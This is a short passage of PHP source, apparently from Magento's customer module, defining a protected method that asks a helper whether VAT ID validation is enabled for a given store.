  1004. /**
  1005. * Check whether VAT ID validation is enabled
  1006. *
  1007. * @param Mage_Core_Model_Store|string|int $store
  1008. * @return bool
  1009. */
  1010. protected function _isVatValidationEnabled($store = null)
  1011. {
  1012. return $this->_getHelper('customer/address')->isVatValidationEnabled($store);
  1013. }
  1014. }